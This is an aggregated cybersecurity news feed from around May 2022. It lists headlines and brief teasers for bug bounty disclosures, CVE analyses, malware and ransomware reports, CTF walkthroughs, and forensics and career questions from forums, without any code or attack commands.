    Opening Old Web Page Content or Browsing the Internet Archive (for pages that have already been deleted)
    Sometimes an auditor, in the effort to gather data and information from the internet, needs to revisit a web page to… Continue reading on Medium »
  • Open

    RedTeam and Penetration Testing Checklist
    Red Teaming and Penetration Testing Checklist, Cheatsheet, Clickscript Continue reading on Medium »
    What I learned after hacking my first 20 boxes from Hack the Box…
    This Post is for Beginners from a Beginner’s perspective. Continue reading on Medium »
  • Open

    SecWiki News 2022-05-13 Review
    Looking at the ATT&CK Update History from the Release of ATT&CK V11 by ourren. For more of the latest articles, visit SecWiki
  • Open

    MFA (Multi-Factor Authentication)
    Multi-factor authentication is when you use two or more authentication factors to verify your identity. These factors include Something… Continue reading on Medium »
    Announcing Pay At Triage for Bug Bounty
    By John Turner, Staff Security Technologist & Vinay Venkateswara Rao, Senior Security Technologist Continue reading on Uber Privacy & Security »
    From android app to access admin dashboard
    One of the easy and interesting vulnerabilities that I found, which led to access to a company's admin dashboard (internal system): Continue reading on Medium »
    [Bug Bounty] Sql Injection and Bypass Sql Login
    Hi everyone, how are you? I hope you're all doing well. This time I want to share my write-up about bug bounty and… Continue reading on Medium »
  • Open

    The Collapse of Algorithmic Stablecoin UST: A Perfect Storm or a Financial Hunt?
    Terra, formerly the second-largest economy in the decentralized finance world, failed completely in this unprecedented crypto storm.
    Zhangshu Information: Four Difficulties in Security Solutions Tailored to Media Businesses | Cybersecurity New Forces SOLO Launch Season
    Which aspects do the security needs of the media industry focus on? What security scenarios exist? What security products are needed?
    Suspected Iranian APT34 Launches New Round of Attacks on the Jordanian Government Using a New Backdoor
    Malwarebytes discovered a malicious email targeting officials at Jordan's Ministry of Foreign Affairs; analysis attributed the attack to APT 34, a group suspected of being linked to Iran.
    First Release! Interpretation of the Securities and Futures Industry Cybersecurity Management Measures (Draft for Comment)
    On April 29, 2022, the China Securities Regulatory Commission solicited public comments on the Securities and Futures Industry Cybersecurity Management Measures (Draft for Comment).
    FreeBuf Morning Report | Gaming Giant Blizzard Hit by DDoS Attack Again; Key Canadian Air Force Supplier Hit by Ransomware
    Activision Blizzard, the world's largest game developer and publisher, said on Twitter that its Battle.net service was under DDoS attack.
    [Yi Compliance Weekly Class] In Depth! Frequently Reported Issues: Apps Forcibly, Frequently and Excessively Requesting User Permissions
    Currently, it has become the norm for apps to request and use system permissions and collect personal information in order to implement business functions.
    Penetration Testing: File Upload Vulnerabilities
    File upload vulnerabilities, as the name suggests, can appear at any feature point that allows file uploads.
    FreeBuf Enterprise Group Discussion | On Software Supply Chain Security and SCA Technical Practice
    Is SCA the best means of addressing supply chain security? What drawbacks remain in practical application? How should one choose between SCA and tools such as SAST?
    A Brief Discussion on Defending Against LAPSUS$
    In recent months, a cybercrime gang called LAPSUS$ has been in the spotlight.
    Large-Scale Hacking Campaign Compromises Thousands of WordPress Sites
    The campaign injects malicious JavaScript code into WordPress sites to redirect visitors to scam content.
    Pandora Ransomware Sample Analysis Report
    It spreads mainly via phishing emails, vulnerability exploitation and RDP brute-forcing, and adopts a RaaS double-extortion strategy.
    FreeBuf Weekly | REvil Ransomware Returns; Costa Rica Declares State of Emergency over Conti Attack
    REvil ransomware returns, with a new version under active development; a large-scale hacking campaign has compromised thousands of WordPress sites.
    Misconfigured ElasticSearch Servers Expose 579 GB of User Website Records
    Two misconfigured ElasticSearch servers exposed a combined total of about 359 million (359,019,902) records.
    Both Mining and Ransomware: Eternity Malware Toolkit Spreading via Telegram
    This modular toolkit includes an info-stealer, a miner, a clipper, a ransomware program, a worm spreader and a soon-to-launch DDoS bot, with each module sold separately.
  • Open

    Front-end JS Attack and Defense
    Author: Sangfor Qianlimu Security Lab. Original link: https://mp.weixin.qq.com/s/QbfUkU0Fj7Bjk--21H2UQA Introduction: Web crawlers have long been a headache for website maintainers: one must open the door for search engines to improve site ranking and bring in advertising, while also countering malicious crawlers to prevent data from being illegally obtained or even sold. This gave rise to the protracted battle between crawlers and anti-crawler measures. Crawler development has gone from simple scripts in the early days to PhantomJS, ...
    CVE-2022-21907 HTTP Protocol Remote Code Execution Vulnerability Analysis Summary
    Author: yyjb @ 360 Advanced Attack and Defense Lab. Original link: http://noahblog.360.cn/cve-2022-21907-httpxie-yi-yuan-cheng-dai-ma-zhi-xing-lou-dong-fen-xi-zong-jie/ Background: In CVE-2021-31166, the most recent previous HTTP remote code execution vulnerability of 2021, the limited lifetime of the UAF object made it seem unlikely that in practice...
    CVE-2021-34535 RDP Client Vulnerability Analysis
    Author: yyjb @ 360 Advanced Attack and Defense Lab. Original link: http://noahblog.360.cn/cve-2021-34535-rdpke-hu-duan-lou-dong-fen-xi/ Background: Microsoft's August 2021 Patch Tuesday included two RCE vulnerabilities we found interesting; the other is CVE-2021-34535, a code execution vulnerability in the RDP client. In modern Windows systems, the RDP client is not only...
    CVE-2021-26432 NFS ONCRPC XDR Driver Protocol Remote Code Execution Vulnerability Verification Process
    Author: yyjb @ 360 Advanced Attack and Defense Lab. Original link: http://noahblog.360.cn/untitled-2/ Background: In August 2021 there were two fairly serious vulnerabilities worth attention, including the NFS ONCRPC XDR Driver remote code execution vulnerability CVE-2021-26432 and the RDP client remote code execution vulnerability CVE-2021-34535. Our goal is to analyze whether these potentially high-impact vulnerabilities are easy to ... in real-world scenarios
  • Open

    Nuclei – Community Powered Vulnerability Scanner
    Article URL: https://nuclei.projectdiscovery.io/ Comments URL: https://news.ycombinator.com/item?id=31364433 Points: 1 # Comments: 0

  • Open

    Harmful Help: Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla
    We analyze a malicious compiled HTML help file delivering Agent Tesla, following the chain of attack through JavaScript and multiple stages of PowerShell. The post Harmful Help: Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla appeared first on Unit42.
  • Open

    CVE-2022-27778: curl removes wrong file on error
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1565623 - Bounty: $2400
    CVE-2022-27782: TLS and SSH connection too eager reuse
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1565624 - Bounty: $2400
    [CVE-2020-3452] Unauthenticated file read in Cisco ASA
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1555015
    [CVE-2020-3452] Unauthenticated file read in Cisco ASA
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1555021
    CVE-2020-3187 - Unauthenticated Arbitrary File Deletion
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1555027
    CVE-2020-3187 - Unauthenticated Arbitrary File Deletion
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1555025
    SQL Injection on https:///
    U.S. Dept Of Defense disclosed a bug submitted by cdl: https://hackerone.com/reports/232378
    SQL Injection on
    U.S. Dept Of Defense disclosed a bug submitted by cdl: https://hackerone.com/reports/277380
    Storage of old passwords in plain text format
    Recorded Future disclosed a bug submitted by subuganz: https://hackerone.com/reports/1549217 - Bounty: $750
  • Open

    B1txor20 Malware Exploiting Log4j Vulnerability
    Article URL: https://socradar.io/b1txor20-malware-exploiting-log4j-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31358378 Points: 1 # Comments: 1
  • Open

    AI Can Write Code Like Humans — Bugs and All
    New tools that help developers write software also generate similar mistakes. Continue reading on Medium »
    How To Handle The Aftermath Of A Cyber Attack
    Once a breach or an attack happens, the company should try to resolve the issue in 30 days or less. During that time, the team should… Continue reading on Medium »
    Passive/Active Information Gathering: Subdomain Enumeration
    This post is designed to share some of the information I've learned while working through the Information Gathering - Web Edition module in… Continue reading on Medium »
    Xml External Entity Web Application Vulnerability: Mechanisms Part
    XML external entity attacks (XXEs) are fascinating vulnerabilities that target the XML parsers of an application. XXEs can be very… Continue reading on Medium »
    Azuro Launches a $30,000+ Bug Bounty on Immunefi
    Azuro has launched a bug bounty on web3’s leading bug bounty platform Immunefi, with hackers being rewarded a maximum bounty of $21,500… Continue reading on Medium »
  • Open

    War in Ukraine / May 11
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    My service for spying on Telegram users…
    Today I wanted to tell you about one of my developments — “Telegram Deanonymizer”. This development allows you to identify anonymous… Continue reading on Medium »
    The Moonshot Threat Bulletin — at a glance
    Moonshot’s Threat Bulletin is a new monthly insights service providing an overview of the key events, themes and narratives discussed by… Continue reading on Medium »
    Operation Galaxios Writeup
    Operation Galaxios is an Open Source Intelligence (OSINT) competition, set up by the team over at Hactoria. Each month they release a… Continue reading on Medium »
  • Open

    Web History Using Paladin
    Hello again... I have been using Sumuri Paladin for some time now and I think it is an excellent tool! I've been thinking about its application at scene/in the field and in particular using it to find web history on a target device. I've looked at all of the tools in the toolbox but as someone who is not the strongest with CLI tools I could do with a bit of help. Any advice or suggestions on how to get Web history within Paladin would be awesome thanks! 🙂 submitted by /u/dwaynehicks2179 [link] [comments]
    Bitlocker password request without Bitlocker
    Hello everyone, yesterday I made an EnCase file from a Windows 10 computer with Tableau TX1 (NVMe SSD). If I mount it with FTK Imager as Logical or Physical there's no problem, I can see everything. Everything is fine also if I convert the EnCase file into a VMware machine. If I try to index the EnCase file with Vound W4 (or with Autopsy), it requests the BitLocker password, but there isn't any BitLocker inside Windows and Microsoft disk encryption isn't activated. Also, when I made the forensic copy with Tableau TX1, it alerted me that the NVMe SSD was encrypted with BitLocker, but this is not true. The question is: how is it possible? How can I recover the BitLocker recovery key after I turn on the VMware machine? submitted by /u/Zipper_Ita [link] [comments]
    Axiom timeline question
    Having some problems for some reason with highlighting a few thousand files in timeline. Can shift and get a few hundred. Right click - export doesn't allow you to select all. Space bar highlights what you have. Any way to grab all of the several thousand files in the timeline? Thanks. submitted by /u/clarkwgriswoldjr [link] [comments]
  • Open

    Developers Day CTF Walkthrough
    Assalum Alikum, This is Rehan Mumtaz from NED university . It is my first writeup for CTF challenges walkthrough . Our team m4lware ended… Continue reading on Medium »
    Invoca Capture the Flag (CTF) 2022
    A perspective from a first-time CTF host, novice penetration tester, and Security professional Continue reading on Medium »
  • Open

    30 GB of horse xrays
    https://www.xrays.horse/examinations/ submitted by /u/Pelicaros [link] [comments]
    Thousands of cute pixel art gifs
    http://www.u.arizona.edu/~patricia/cute-collection/ submitted by /u/Pelicaros [link] [comments]
  • Open

    Zyxel Firewall Unauthenticated Command Inject (CVE-2022-30525)
    submitted by /u/chicksdigthelongrun [link] [comments]
    Hacking Electron Applications - 0x101
    submitted by /u/r0075h3ll [link] [comments]
    Content Security Policy for Dummies
    submitted by /u/r0075h3ll [link] [comments]
  • Open

    SecWiki News 2022-05-12 Review
    CVE-2021-31209 Analysis and Study by SecIN Community. For more of the latest articles, visit SecWiki
  • Open

    ICS Security: How to Hack the World
    Let's talk about how to take down industrial control devices.
    FreeBuf Morning Report | Five Eyes Countries Issue New Security Advisory; Spain's Intelligence Chief Fired over Pegasus Scandal
    As the Russia-Ukraine conflict escalates confrontation in cyberspace, US government concerns have grown that Russia could break into domestic computers through Kaspersky software.
    National Medical Products Administration Releases the 14th Five-Year Plan for Drug Regulatory Cybersecurity and Informatization Construction
    The Plan states that China aims to achieve a leap from a major pharmaceutical country to a pharmaceutical powerhouse, which places higher demands on drug review and approval efficiency and on drug safety risk management capabilities.
    Java Code Audit: Data Types and Operators (2)
    The main() method is the main method in the class body. The method runs from { to }.
    Potential Threats and Challenges in Supply Chain Cybersecurity
    Recent unusual events such as the Russia-Ukraine conflict, Brexit and supply chain imbalances have brought unprecedented challenges to global supply chains.
    Multiple Cybersecurity Law Enforcement Agencies Warn: More and More Hackers Are Targeting MSPs
    Recently, members of the Five Eyes intelligence alliance issued a warning to managed service providers (MSPs) and their customers.
    HP Fixes Firmware Bugs Affecting More Than 200 Models
    HP recently released BIOS updates fixing two serious vulnerabilities affecting a wide range of PC and laptop products.
    New Stealthy Nerbian RAT Malware Emerges
    Security researchers discovered a new malware called Nerbian RAT, which has the ability to evade detection and analysis by researchers.
    REvil Ransomware Returns, New Version Under Active Development
    Researchers analyzed newly discovered samples and found multiple modified new versions appearing within a short period, indicating that REvil is once again under active development.
    Operation (Dragon) EviLoong: An Electronic Party of "Borderless" Hackers
    This article only shares the attack techniques used by the APT-Q-29 group over a recent period and does not discuss the victim organizations.
    Malicious NPM Packages Target German Companies in Supply Chain Attacks
    On May 11, cybersecurity researchers discovered several malicious packages in the NPM registry specifically targeting well-known media, logistics and industrial companies located in Germany for supply chain attacks.
    FreeBuf Morning Report | EU Accuses Russia of Attacking Ukrainian Satellite Network; REvil Ransomware Gang Returns After Six Months of Silence
    The EU accused Russia of attacking the Ukrainian KA-SAT satellite network operated by Viasat on February 24. The cyberattack caused communication outages in Ukraine and also affected several EU member states.
  • Open

    Disambiguation: Privilege vs. Access vs. Permission
    New to infosec and I feel like these have discrete meanings but are used interchangeably. Any help in defining the vernacular understanding would be appreciated. So specifically, I'm looking for what you think most people think the definition is. Access: an abstraction meaning permissions to access an object (file, image). Privilege: a right granted to an agent [identity] (i.e., a user or a non-people identity) to "do something," like run a program. Sometimes it's used to define rights that are abnormal, special, or temporary. Permission: a property specifically of an object (file) that delineates which agents are permitted to use the object and what they can do with it (read/modify etc.). So in contrast, access is about getting to objects, privilege is about running stuff, and permissions are the individual configs sitting on an object or agent that tell you what they can/can't do. Thanks for any help... submitted by /u/AreThoseNewSlacks [link] [comments]
  • Open

    Api endpoint- Revealed Transaction Details of about Millions of users
    No content preview

  • Open

    TCU Live: 2022MAY11 (latest release)
    The latest version of "TCU Live" (2022MAY11) has been released. It's running the latest Debian sid packages, Linux 5.17 kernel, and third party packages such as the Tor Browser, checkra1n, apfs-fuse, floss, etc. See the README in the link for more information: https://drive.google.com/drive/folders/0B8zx3qPcj9rJVjJrcnB4aXl1VG8?resourcekey=0-gjI_o4MHtiCvsjet9TCygw&usp=sharing It's built to be fairly lean and extensible and is great for in-house forensics, OSINT, field work, or if you just need to quickly spin up a Linux box. If you are looking for something that'll boot on almost all x86-64 (AMD64) hardware give it a shot and DM me if you have any comments or issues. submitted by /u/atdt0 [link] [comments]
    FTK exif search
    Hi all I am trying to search for specific exif details. Apparently according to FTK 7.4 and beyond you can parse this data and create columns out of it. Well if you can, I can’t work it out at all. I’m after exif that I can clearly see in the exif properties of image files, but how do I search it? Eg: exif.image.imagedescription I’d be perfectly happy with that in a column and all the details in there. Just after some pointers on how I go about sorting the data. Thank you submitted by /u/Cerveza87 [link] [comments]
  • Open

    Ddosify – Simple Load Testing Tool
    submitted by /u/binaryfor [link] [comments]
    URL spoofing in Box, Google, and Zoom
    submitted by /u/rsobers [link] [comments]
  • Open

    Go 1.18 Stabilizes Generics, Fuzzing, Multi-Module Support, Improves Performance
    Article URL: https://www.infoq.com/news/2022/03/go-1-18-stable/ Comments URL: https://news.ycombinator.com/item?id=31346891 Points: 5 # Comments: 0
    Earn $200K by fuzzing for a weekend: Part 1
    Article URL: https://secret.club/2022/05/11/fuzzing-solana.html Comments URL: https://news.ycombinator.com/item?id=31346190 Points: 43 # Comments: 3
  • Open

    How encrypted is the reddit mobile app?
    I am using the reddit mobile app on Android. What can my Internet provider or the owner of the WLAN I am currently connected to see? 1. The subreddits I am visiting? 2. The subreddits I am following? 3. The posts I am up/down voting and saving? 4. The posts I am making myself (like this one)? I don't know much when it comes to networking and the technology behind it, so please explain so that even a non-professional like me understands this. Thank you! submitted by /u/gentleXenomorph [link] [comments]
    McAfee Endpoint Security Policies
    Hi there. Are there people here who work with McAfee ENS TP/ATP? I don't really see a workflow on how to tune ENS policies: whitelisting noisy events, or understanding where I can turn on the "Block" status of a policy. I have a lot in "Report Only" status, but this is very insecure. And it's hard to understand the context of events, because there can be up to 150K events per day. Basically, I'm worried about putting Block, because there can be an impact on the business. Perhaps someone knows some resources where I can read best practices? For example, a list of programs that can be whitelisted, or which policies can be (or are highly recommended to be) put in the Block status. submitted by /u/athanielx [link] [comments]
    Where can I post my services?
    I have been trying to get a job as security analyst, but all they require a secret clearance. Where can i post my services as Cyber Security Analyst? Basic contracts like Incident handling and forensics. submitted by /u/theRunAroundGroup [link] [comments]
    Personal favorite VPN
    I've been shopping around and looking for a new VPN provider, curious which ones you all like and why? submitted by /u/Durza44 [link] [comments]
    Best intro cert or training?
    I'm a 15 year professional with 5-years of IT experience directly in project and program management. I'm about to take on a program role in cyber security for my company and was hoping to get feedback on crash course training or entry level certs I should be looking at to familiarize myself with the technical side. I currently hold certs with PMI and SAFe... Any recommendations or general tips? submitted by /u/aryding [link] [comments]
  • Open

    A Detailed Guide on Rubeus
    Introduction Rubeus is a C# toolkit for Kerberos interaction and abuses. Kerberos, as we all know, is a ticket-based network authentication protocol and is used The post A Detailed Guide on Rubeus appeared first on Hacking Articles.
  • Open

    Remote kernel heap overflow
    PlayStation disclosed a bug submitted by m00nbsd: https://hackerone.com/reports/1350653 - Bounty: $10000
    CVE-2022-30115: HSTS bypass via trailing dot
    curl disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1557449
    CVE-2022-27780: percent-encoded path separator in URL host
    curl disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1553841
    SQL injection via vulnerable doctrine/dbal version
    Nextcloud disclosed a bug submitted by nickvergessen: https://hackerone.com/reports/1390331
    CVE-2022-27782: TLS and SSH connection too eager reuse
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1555796
    Account takeover via Google OneTap
    Priceline disclosed a bug submitted by badca7: https://hackerone.com/reports/671406 - Bounty: $1500
    CVE-2022-27779: cookie for trailing dot TLD
    curl disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1553301
    CVE-2022-27778: curl removes wrong file on error
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1553598
    Certificate authentication re-use on redirect
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1563061
  • Open

    120k Email Credential Leaks | Plain Passwords
    It’s been a while since my last article published here on Medium, but what I'm going to share with you in this article is related to an email… Continue reading on Medium »
    War in Ukraine / May 10
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    TryHackMe - Red Team OPSEC
    Hello Everyone. In this blog let’s see how to solve Red Team OPSEC room in TryHackMe. Continue reading on Techiepedia »
    The MITRE ATT&CK Framework
    In this blogpost, I’ll try my best to give you a very basic idea of what MITRE ATT&CK framework is and why it is the need of the hour in… Continue reading on Medium »
  • Open

    DigitalOcean mitigated the AMD vulnerability CVE-2021-26339
    Article URL: https://www.digitalocean.com/blog/digitalocean-mitigated-the-amd-vulnerability-cve-2021-26339 Comments URL: https://news.ycombinator.com/item?id=31342031 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-05-11 Review
    Meta-learning: teaching machine learning to learn by ourren; Enterprise security building: a full view of asset management by ourren; Analysis and demonstration of the new eBPF backdoor boopkit by ourren; Analysis of the F5 BIG-IP unauthenticated RCE (CVE-2022-1388) by ourren; Commit Level Vulnerability Dataset by ourren; Satellite internet development and information security trends by ourren; Experience and journey of publishing top-conference papers: aim for the summit, keep pursuing excellence by ourren. For more of the latest articles, visit SecWiki
  • Open

    Java code audit: basic array operations (3)
    An array is a container that can store primitive types or reference types; all data stored in it must be of the same type.
    A record: the UK National Cyber Security Centre has sent 33 million alerts to the public
    The UK National Cyber Security Centre recently published a report saying it has sent more than 33 million alerts to organisations that had registered for its Early Warning service.
    Researchers discover a new phishing-as-a-service: Frappo
    Frappo, offered as phishing-as-a-service, lets cybercriminals generate convincing phishing pages that mainly target online banking, e-commerce and online services in order to steal customer data.
    Microsoft fixes a new NTLM zero-day in all Windows versions
    Microsoft recently addressed an actively exploited Windows LSA zero-day vulnerability.
    During Russia's Victory Day, hackers broadcast anti-war messages on TV
    During Russia's Victory Day, some domestic TV stations suffered cyberattacks; after gaining access, the hackers broadcast anti-war messages.
    Happycorp:1 Vulnhub machine walkthrough
    A Vulnhub machine, covering the full penetration-testing process. The write-up is detailed and concrete, suitable for learning and practice.
  • Open

    [Security Bulletin] Microsoft May 2022 Patch Tuesday fixes multiple high-severity vulnerabilities
    Microsoft has recently released its May 2022 security updates, fixing 75 vulnerabilities across 36 Microsoft products, notably including 3 "0day" vulnerabilities, affecting Windows and Windows components, Visual St...
  • Open

    11 Essential Tools for Java Developers
    No content preview
    PWN101 Walkthrough | TryHackMe
    No content preview
    Cryptography essential for H4CK3R and CTF player 0x1(encoding).
    No content preview
  • Open

    IDOR exposes monetization status of any page’s video in Creator Studio.
    During testing I’ve found that the “variables=%7B%22id%22%3A%22videoID%22%7D” parameter is vulnerable to IDOR. The vulnerability occurs when… Continue reading on Medium »
    Creator Studio’s api endpoint is vulnerable to IDOR, exposes “p40_earnings_usd”:$$$
    During my testing I tried to test all queries by changing PageIDs. Moreover, one of the queries is vulnerable to IDOR. It was the query named… Continue reading on Medium »
    Click for it
    Click to find vulnerability Continue reading on Medium »
    Improper Handling of Undefined Parameters [CWE-236] — The Hacktivists
    Improper Handling of Undefined Parameters describes a case when an application uses an undefined parameter, field, or argument. Continue reading on Medium »
    Incorrect Default Permissions [CWE-276] — The Hacktivists
    Incorrect Default Permissions weakness describes a case where software sets insecure permissions to objects on a system. Continue reading on Medium »
    Cross-Site Scripting — XSS [CWE-79] — The Hacktivists
    Cross-Site scripting or XSS is a weakness that is caused by improper neutralization of input during web page generation. Continue reading on Medium »
    Wombat’s Bug Bounty Program with Immunefi — Earn up to $500,000!
    Wombat’s goal is to deliver you the best stableswap in existence. That wouldn’t be possible without making the safety of our users’ funds… Continue reading on Wombat Exchange »
  • Open

    Diving into .NET WEB
    Author: Knownsec 404 Lab Longofo Date: 2022-05-11. Not long ago I got an assignment against a .NET target; for a while Exchange had vulnerability after vulnerability, and I had long wanted to study .NET-related things systematically, so now that I ran into it I'm catching up while it's fresh. There isn't much introductory material on .NET WEB, or what exists is not really suitable for beginners, and most experienced people jump straight into deserialization or vulnerability analysis; fortunately a colleague in the department, @HuanGMz, who has worked with .NET, gave me a hand, so it was relatively less...
  • Open

    compost
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Advice regarding career opportunities living in S.A.
    Hello everyone! I'm fairly new to the community, but I'm glad to see questions get taken seriously here. I'm a pentester, almost 4 years of experience performing web and mobile application pentesting, but mainly focused on internal infrastructure assessments (Active Directory pentest with multiple forests, Red Team exercises, pivoting and accessing segmented networks) along with experience in Incident Response and Threat Hunting projects (basic knowledge in ELK stack, Carbon Black Response, Darktrace and basic Crowdstrike, automating tasks with Powershell/Bash) along with the capability to coordinate activities with clients and present results to both technical and executive staff. I have a bachelor's degree in System's engineering (that's how the career is called here for some reason,…
    Good questions to ask the Cybersecurity Analyst I I'll replace (as someone new to Cybersecurity field)
    I have the opportunity to land a Cybersecurity Analyst I position, but don't really have much if any knowledge on the position/field(they'll train). What questions should I ask when I get to have a casual talk with the team member (non-manager) who I'd be replacing? From the little knowledge I have so far, I think I would set my long-term security goals towards Cloud Security or DevSecOps. I have some interest in Cloud(company uses AWS and a some Azure), and have no issues with doing programming/scripting, but just don't want to focus on it. From what I gathered from the job description, I'll be doing vulnerability scanning, risk/security assessments of databases/apps/servers/desktops/network devices. Monitoring SIEM, help administer endpoint protection software, work on reports and planning, etc. My questions so far include: typical day look like? how's on-call? Tools used? Do you think this job prepared you well for future jobs in cybersecurity? Pretty much looking for questions to give me an idea of what to expect, and how this will impact the rest of my career. Thank you. submitted by /u/43t20a [link] [comments]
    .shd and .spl files
    Came across these files on a print server under (c\windows\ System32\spool\PRINTERS) Can you re-print these files or view these files through a software, to see what they were? I tried copying them to another machine and see if I can reprint them from the same directory I’m trying to make a case to the admins to remove these files if they pose a security/privacy issues. submitted by /u/Yahweh03-08 [link] [comments]
    Compliance Queries
    Hey, I know that there's a big focus on SaaS companies vulnerability regarding data security. If you have any questions regarding SOC 2 and ISO 27001 compliance. I would love to answer any questions below. I've been speaking to quite a few people within this domain and there seems to be a lot of confusion regarding the subject matter. I'm happy to answer any questions that you might have. *For context purposes, I work for a start up called Scytale AI which focuses on SOC 2 compliance (this is purely for context and credibility purposes, not for promotional purposes). submitted by /u/Thecomplianceexpert [link] [comments]
    Completed my GCIH today!
    I'm very excited as this was my first SANS certification. So, curious to know, what should I do next? I'm planning on doing the Pentest+ because I received a free voucher but, SANS has so many options. I'm currently 5 years into my security career. I've done mostly SOC and SecOps work with some time in ProServices and did the SE thing. It wasn't what I planned, exactly, but I've learned tons along the way. I'm completely open to suggestions. What else is out there, friends? submitted by /u/iam0r0r0 [link] [comments]
    Which password manager would work within a 1500ish employee company with office & Mobile workers (engineers) best?
    Hi, if hypothetically a password manager would be implemented within a business of this size and nature, focusing on the strength of the passwords, being able to reset passwords and/or IT able to securely reset for users and hand over the password manager? As mobile workers/engineers only have a tablet and don’t always remember their passwords, they need resetting often (how to automate it). What would it be and why? Also factoring in cost, as the company may not be fully on board with shelling out too much. If there’s anything I’ve missed, appreciate the questions, I can answer. Thanks :) submitted by /u/thelaw281 [link] [comments]
  • Open

    ETH Amsterdam — Hats hits the road
    Seven years ago, Amsterdam hosted one of the first ever international Ethereum conferences. Our OG CTO, Shay Zluf, was a keynote speaker… Continue reading on Medium »
    RCE via Dependency Confusion
    Hey there, I am Samrat Gupta aka Sm4rty, a Security Researcher and a Bug Bounty Hunter. In this Blog I will be sharing my recent finding… Continue reading on System Weakness »
    RCE via Dependency Confusion
    Hey there, I am Samrat Gupta aka Sm4rty, a Security Researcher and a Bug Bounty Hunter. In this Blog I will be sharing my recent finding… Continue reading on Medium »
    Business Logic Vulnerabilities (easy hit) Bug-Bounty
    Hello Cybersecurity Researchers, Continue reading on Medium »
    UniLend Finance moving towards Omnis Testnet with Completion of Bug Bounty
    UniLend Omnis, the upcoming new version for Lending and Borrowing of every ERC20 asset, sets another milestone and moves very close to… Continue reading on Medium »
    ResolveURI RXSS Imperva Waf Bypass
    Hi, Asslam-o-Alaikum Continue reading on Medium »
    Announcing the SynFutures V2 Testnet Bug Bounty Program
    We recently announced that our V2 testnet is now open and available for anyone to use and test! Continue reading on SynFutures »
  • Open

    Resources for important logs companies should be capturing?
    Newer to the field, and don't know much about what specific logs past the basics companies should be capturing. Logs coming from VPNs, Routers, Firewalls, Windows, etc. Logs related to AWS and Azure. Any thoughts? submitted by /u/haloman882 [link] [comments]
    Lateral movement diagrams
    How is your team displaying lateral movement for a report? Are you using Visio, Maltego, PowerPoint or something else? submitted by /u/purpleteamer24 [link] [comments]
    How do I view a file using a sleuth kit command?
    Hi everyone! Trying out sleuthkit for a school project and I'm stuck on one thing. There are questions where I am expected to, for example, "see the colour of an animal in a jpg file" or "tell what's spinning in a mp4 file". Tried to figure it out by myself but I have no clue anymore how to run and view a jpg or mp4 file. Could someone help me out? Thanks! submitted by /u/ahmedmourad22 [link] [comments]
    XWAYS File System image
    Hey guys, I hope everyone is well! It’s been a while. Does anyone have a small image with XWFS/XWFS file system? Or possibly able to make one? I don’t have an xways license myself so cannot create simple images with x ways proprietary file system. submitted by /u/SecrectSoc [link] [comments]
    Finding evidence of email tampering
    Hi folks, Sorry if this is not allowed, but I would appreciate any advice. Is there any way to determine if an outlook message has had attachments removed from it? I have a copy of the original .msg file that contains some attachments, but I need to determine if additional attachments were removed (with the remove attachments option, for example) before the file was sent to me. An examination of the header just shows: X-MS-Has-Attach: yes but doesn't indicate if any were removed, as far as I can tell. Is it possible to see in the header or other part of the file a list of the attachments, or at least the number of attachments? submitted by /u/mercsal [link] [comments]
  • Open

    Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923)
    submitted by /u/ly4k_ [link] [comments]
    Learning Linux kernel exploitation - Part 2 - CVE-2022-0847 (DirtyPipe)
    submitted by /u/0x00rick [link] [comments]
    Diving into Pre-Created computer accounts in Active Directory
    submitted by /u/oddvarmoe [link] [comments]
  • Open

    Threat Brief: CVE-2022-1388
    CVE-2022-1388 is a critical vulnerability that needs immediate attention. Learn what we've observed in the wild and strategies for mitigation. The post Threat Brief: CVE-2022-1388 appeared first on Unit42.
  • Open

    War in Ukraine / May 9
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    TryHackMe —  OhSINT Walkthrough
    Hello, we will be working on the TryHackMe box called “OhSINT”. This is labeled as an easy box and found this box to be useful, as well as… Continue reading on Medium »
    Is Google Spying on Our Gadgets? Now I’ll try to prove…
    Let’s take Russian e-mail to Yandex p12v@yandex.ru. Install it Yandex ID: 24585015. The easiest way to do this is through the bot… Continue reading on Medium »
    EZ Capture The Flag 2022 [Indonesian Version]
    A write-up containing only the solutions to the OSINT-category challenges of EZ CTF 2022… Continue reading on Medium »
    Yandex Zen haters identification…
    How to identify a hater on the popular Russian site for bloggers Yandex Zen? Continue reading on Medium »
    EZ-CTF by CTF Cafe: OSINT challenges Solves and some lessons
    On May 06th the first CTF organized by CTF Cafe was held with 1,700 registered participants. Our team, the SpaceCows made 72th out of 848… Continue reading on Medium »
  • Open

    Common C Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    SecWiki News 2022-05-10 Review
    MySQL 8.0 feature: injection without select by SecIN Community. For more of the latest articles, visit SecWiki
  • Open

    Introducing pyCobaltHound
    pyCobaltHound is an Aggressor script extension for Cobalt Strike which aims to provide a deep integration between Cobalt Strike and Bloodhound. https://blog.nviso.eu/2022/05/09/introducing-pycobalthound/ submitted by /u/A32AN [link] [comments]
    Diving into pre-created computer accounts
    submitted by /u/oddvarmoe [link] [comments]
  • Open

    Diving into pre-created computer accounts
    I was on an engagement where I simply could not elevate privileges, so I had to become creative and look deep into my old bucket (bucket being my head) of knowledge, and this resulted in some fun stuff. I had found that the client had a vulnerable certificate template also known as ESC1 that allowed... The post Diving into pre-created computer accounts appeared first on TrustedSec.
  • Open

